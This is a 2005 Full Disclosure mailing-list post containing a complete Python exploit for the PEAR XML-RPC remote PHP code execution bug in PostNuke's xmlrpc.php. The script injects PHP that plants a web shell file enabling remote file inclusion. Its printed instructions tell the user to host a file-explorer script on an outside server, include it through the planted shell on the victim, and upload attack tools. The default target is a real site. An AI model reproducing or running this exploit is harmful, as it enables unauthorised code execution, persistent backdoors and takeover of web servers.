<<< Date Index >>>     <<< Thread Index >>>

Full Disclosure - XMLRPC Exploit Code written in Python jul 2005



#!/usr/bin/python

# ./xmlrpc.py [chk|xpl] host uri
# example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php
# example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php
# Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working 
for me
# so i made this python code
# http://pear.php.net/bugs/bug.php?id=4692
# Bug #4692     Remote Code Exection In XML RPC Server
# xmlrpc.pl http://pathtoxmlrpc/server
# "id;pwd;uname -a;uptime"
# [*] Sending command id;pwd;uname -a;uptime
# [*] Command sent, waiting for response
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# /var/www/drupal
# Linux cacophony 2.4.18-bf2.4  Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
# 23:27:22 up 5 days,  9:05,  0 users,  load average: 0.12, 0.16, 0.21
# http://www.postnuke.com/xmlrpc.php
# by k3rn3lp4nic. greetz: albanian security clan!!! july 2005


import sys, httplib

try:
        chose = sys.argv[1]
except IndexError:
        chose = 'chk'

try:
        host = sys.argv[2]
except IndexError:
        host = 'www.postnuke.com'

try:
        uri = sys.argv[3]
except IndexError:
        uri = '/xmlrpc.php'


def check():
        SoapMessage = """<?xml version="1.0"?>
        <methodCall>
        <methodName>test.method</methodName>
                <params>
                        <param>
                        <value><name>','')); phpinfo(); exit;/*</name></value>
                        </param>
                </params>
        </methodCall>
        """

        webservice = httplib.HTTP("%s" % host)
        webservice.putrequest("POST", "%s" % uri)
        webservice.putheader("Host", "%s" % host)
        webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke 
k3rn37p4nic")
        webservice.putheader("Content-type", "application/xml")
        webservice.putheader("Content-length", "%d" % len(SoapMessage))
        webservice.endheaders()
        webservice.send(SoapMessage)

        # get the response

        statuscode, statusmessage, header = webservice.getreply()
        print "Response: ", statuscode, statusmessage
        print "headers: ", header
        res = webservice.getfile().read()
        print res
        print 'If you see phpinfo dump data the you are succeful. proceed with 
xpl!'

def xpl():

        SoapMessage = """<?xml version="1.0"?>
        <methodCall>
        <methodName>test.method</methodName>
                <params>
                        <param>
                        <value><name>',''));
        echo 'start';
        passthru('del xmlrpcpy.php');
        $filename = 'xmlrpcpy.php';
        $somecontent = '%?php include(~inc); ?#';
        $somecontent = eregi_replace('%', chr(60), $somecontent);
        $somecontent = eregi_replace('~', chr(36), $somecontent);
        $somecontent = eregi_replace('#', chr(62), $somecontent);
        $handle = fopen($filename,'w');
        fwrite($handle, $somecontent);
        fclose($handle);

        passthru('dir');

        passthru('type xmlrpcpy.php');


        echo 'done';
        exit;
        /*</name></value>
                        </param>
                </params>
        </methodCall>
        """

        webservice = httplib.HTTP("%s" % host)
        webservice.putrequest("POST", "%s" % uri)
        webservice.putheader("Host", "%s" % host)
        webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke 
k3rn37p4nic")
        webservice.putheader("Content-type", "application/xml")
        webservice.putheader("Content-length", "%d" % len(SoapMessage))
        webservice.endheaders()
        webservice.send(SoapMessage)

        # get the response

        statuscode, statusmessage, header = webservice.getreply()
        print "Response: ", statuscode, statusmessage
        print "headers: ", header
        res = webservice.getfile().read()
        print res
        print '\n\nExploit Successful!!!\nDownload 
http://www.suneworld.com/programs/webexplorer20.zip'
        print 'Rename index.php3 to index.txt and put it to some public host 
http://somehost.com/index.txt'
        print 'Now Accessed it like this: '
        print 
'http://victimhost/postnukewhatever/xmlrpcpy.php?inc=http://somehost.com/index.txt'
        print 'Then upload your favorite haxor tools! Bye. Stay healthy!'

if __name__ == "__main__":
        print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'
        print 'revised it if you can! ver jul 2005'
        print 'Greetz: Albanian Security Clan!!!'
        print '---------------------------------------------'
        print './xmlrpc.py [chk|xpl] host uri'
        print 'example (check bug): ./xmlrpc.py chk www.postnuke.com 
/xmlrpc.php'
        print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com 
/xmlrpc.php'
        if chose=='chk':
                check()
        elif chose=='xpl':
                xpl();
        else:
                print 'Boom! Script Kiddie'